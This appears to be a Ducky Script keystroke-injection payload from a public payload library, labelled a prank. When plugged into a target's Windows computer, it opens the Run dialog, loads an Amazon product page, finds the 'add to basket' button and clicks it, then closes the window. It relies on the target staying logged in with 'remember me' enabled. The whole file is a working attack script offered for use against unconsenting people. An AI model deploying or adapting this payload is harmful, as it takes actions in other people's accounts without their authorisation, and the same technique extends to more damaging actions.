Path: blob/master/payloads/library/prank/Physical_Rick_Roll/payload.txt
2968 views
REM Title: Physical_Rick_Roll1REM Author: the-jcksn2REM Description: Adds a physical copy of "The Best of Rick Astley" CD to the target's Amazon shopping basket/cart.3REM Target: Windows4REM Version: 1.05REM Category: Prank67REM Requires the target to be logged onto amazon with 'remember me' enabled - most people usually are...8REM Currently configured for amazon.co.uk (British) - see the minor changes required below to use on amazon.com (American)910DELAY 200011GUI r12DELAY 2001314REM ########## THIS ITEM MAY GO OUT OF STOCK, IN WHICH CASE THE PAYLOAD WILL NOT WORK - CHANGE FOR ANOTHER ITEM'S URL IF NEEDED! ##########1516REM ########## FOR AMERICANS - CHANGE THIS FROM '.co.uk' TO 'com' ##########17STRING https://www.amazon.co.uk/Best-Rick-Astley/dp/B00MWPA39Y/ref=sr_1_7?crid=1DTB70Z2TNU5F&keywords=rick+astley+cd&qid=1650786996&sprefix=rick+astley+cd%2Caps%2C71&sr=8-71819DELAY 20020ENTER21DELAY 180022CTRL f23DELAY 4002425REM ########## FOR AMERICANS - CHANGE THIS TO 'add to cart' ##########26STRING add to basket2728ENTER29DELAY 20030ESC31DELAY 20032TAB33DELAY 20034SHIFT TAB35DELAY 20036SPACE37DELAY 60038ALT F4394041